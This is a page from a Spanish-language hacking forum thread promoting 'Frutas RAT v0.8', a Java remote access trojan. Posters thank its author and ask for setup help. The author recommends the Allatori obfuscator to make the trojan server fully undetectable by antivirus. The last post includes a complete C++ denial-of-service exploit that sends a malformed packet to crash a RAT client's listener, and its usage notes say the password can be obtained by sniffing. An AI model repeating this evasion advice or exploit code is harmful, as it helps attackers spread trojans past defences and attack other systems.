Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php?sid=674e53a04cc950efebe0995ff94eb43e

Frutas RATV0.8 [Naranja] Beta

https://www.indetectables.net/viewtopic.php?t=39991

Página 14 de 16

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 07 Nov 2012, 15:27
por M0nst3rVip
Gracias AdWind, una maquina xD

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 08 Nov 2012, 18:46
por cobrazzi
Alguno podria indicarme como dejar indetectable el server. gracias

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 09 Nov 2012, 04:59
por adwind
cobrazzi escribió:Alguno podria indicarme como dejar indetectable el server. gracias
te recomiendo este excelente ofuzcador "Allatori-4.3-Demo" te los dejará FUD.

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 12 Nov 2012, 18:30
por kender
amigo gracias por este maravilloso rat te felicito hermano muy bien q lo ayas posteado gracias

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 16 Nov 2012, 12:39
por Skarner
Ya lo tengo descargado, y disculpadme, me vais a llamar n00b, Pero... ¿Ahora que hago?, es decir, lo tengo bajado pero no veo donde está el cliente para ejecutarlo ni nada... Yo antes estaba metido en el tema este, soy de la vieja escuela... Pero lo dejé en 2006 (Con la era del Bifrost) y no sé que hacer... Mi pregunta es básica, el funcionamiento sigue siendo el mismo de un troyano?, se sigue usando el No-IP Duck y demás?,

Un saludo!

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 16 Nov 2012, 14:44
por tcpip49
Muy bueno el rat , felicitaciones, me da un error al iniciar el No-Ip que podra ser?
me anduvo bien el 1er inicio del no-ip y luego no mas.
Estoy bajo vm, gracias !!!

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 16 Nov 2012, 17:28
por SuC
Skarner escribió:Ya lo tengo descargado, y disculpadme, me vais a llamar n00b, Pero... ¿Ahora que hago?, es decir, lo tengo bajado pero no veo donde está el cliente para ejecutarlo ni nada... Yo antes estaba metido en el tema este, soy de la vieja escuela... Pero lo dejé en 2006 (Con la era del Bifrost) y no sé que hacer... Mi pregunta es básica, el funcionamiento sigue siendo el mismo de un troyano?, se sigue usando el No-IP Duck y demás?,

Un saludo!
Necesitas tener instalado Java para ejecutarlo

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 16 Nov 2012, 21:40
por CrazyMotion
Man podrias almenos encryptar la config en md5 o sha1 cuando lo abres como winrar aparece el no-ip y la contraseña u.u

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 20 Nov 2012, 05:55
por kender
magnifico y muchas gracias por compartirlo Men

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 21 Nov 2012, 17:50
por rrasnter28
Re buenisimo..
thank!
Probando..!

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 22 Nov 2012, 05:38
por kolesar
Hola compañero todo va bien hasta que quiero ver las contraseña en me salta este aviso de AVG .. me infecte solo para poder probarlo y tiene muy buena pinta, un saludo espero que saques la versión full.

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 01 Dic 2012, 18:05
por warflop
¿Podría alguien ayudarme a configurar paso a paso?

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 01 Dic 2012, 22:34
por adwind
warflop escribió:¿Podría alguien ayudarme a configurar paso a paso?
rompes mí corazon. Pues es facil configurarlo.

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 02 Dic 2012, 11:31
por KaoZ_Kronos
NO me deja descargarlo, sera xk me acabo de registrar? Gracias de antemano ;)

Re: Frutas RATV0.8 [Naranja] Beta

Publicado: 06 Dic 2012, 01:38
por adwind
Esta tarde me llego un MP de un compañero del foro donde demuestra el error que comentaba Fernando en post anteriores, y realizó un pequeño codigo para provocar el error y asi ya no seguir aceptando conexiones a menos que se reinicie el cliente,

aqui el codigo fuente

Código: Seleccionar todo

/*  Frutas RATV0.8 [Naranja] Beta Denial Of Service
 *  Author: Kevin R.V <[email protected]> 
 *    Date: 2012
 * License: Totally free 8-)
 * */

#include <iostream>
#include <winsock2.h>

#define VERS "0.1"

int   connected;
using namespace std;

void PoC(char * host, unsigned int port, const char * szPassword)
{
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0),&wsa);
	SOCKET sock;
    struct sockaddr_in  local;
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	local.sin_family = AF_INET;
	local.sin_addr.s_addr = inet_addr(host);
	local.sin_port = htons(port);
	if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
	{
		//Original info packet "ES?00-19-66-98-5C-16?192.168.1.10?Kevin?Windows XP 5.1 x86?1.7.0_09-b05?0.8\0"
		//the denial of service reason is that the application splits the string by using unsafe modes.
		//then it gets a crash by accesing to not allowed memory
		//As you can see I have removed the first two delimiters, '?' is the delimiter
		//it don't crash because its Java :P but no one can connect to the client after the attack.
		char payload[] = "ES00-19-66-98-5C-16?192.168.1.10Kevin?Windows XP 5.1 x86?1.7.0_09-b05?0.8";
		cout << "[+] Connected to " << host << ":" << port << endl;

		//Incoming connection packets
		sendto(sock, "\x00", 1, 0, (struct sockaddr *)&local,sizeof(local)); 
		sendto(sock, "\x04", 1, 0, (struct sockaddr *)&local,sizeof(local));
		cout << "[+] Sending Incoming connection packets" << endl;
		//password
		sendto(sock, szPassword, strlen(szPassword), 0, (struct sockaddr *)&local,sizeof(local)); 
		//wait 1 second to confirm the password
		sendto(sock, "\x00", 1, 0, (struct sockaddr *)&local,sizeof(local));
		// its the first char of your current username
		sendto(sock, "K", 1, 0, (struct sockaddr *)&local,sizeof(local));  
		cout << "[+] Sending the malformed packet " << endl;
		sendto(sock, payload, sizeof(payload), 0, (struct sockaddr *)&local,sizeof(local));
		Sleep(3000);
	}
	else
	{
		closesocket(sock);
		cout << "[-] Can't connect to server" << endl;
		return;
	}

	if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
	{
		cout << "[-] remote trojan looks alive :( maybe a new version?" << endl;
	}
	else
	{
		cout << "[+] The remote trojan looks dead, congratz, no one can connect there until they reboot it =P" << endl;
	}

}
int main(int argc, char *argv[])

{
	cout << "Frutas RATV0.8 [Naranja] Beta Denial Of Service " VERS << endl << endl;
	cout << "by Kevin R.V <[email protected]" << endl;
	if ( argc < 7 )
	{
		cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port> -k <trojanpassword> (you can get it sniffing)" << endl << endl;
		exit(-1);
	}
	
	u_short port;
	char * ip;
	char * pass;
	
	for(int i = 0; i<argc; i++)
	{
		if( ! strcmp(argv[i], "-h") != 0 )
		ip = argv[i+1];
		else if( ! strcmp(argv[i], "-p") != 0 )
		port = atoi(argv[i+1]);
		else if( ! strcmp(argv[i], "-k") != 0 )
		pass = argv[i+1];
	}
	
	cout << "[+] Starting exploit" << endl << endl;
	PoC(ip, port, pass);
	
	
	return 1;
}
Por suerte encontre una copia de esta version pense no tenia ninguna, ya que iba modificando un source como iba en la marcha. asi que mañana posteo la v8 final. corrigiendo varios errores. Y uno que otro regalito ^^
Todos los horarios son UTC+02:00
Página 14 de 16

© Indetectables Team

Desarrollado por Indetectables LAB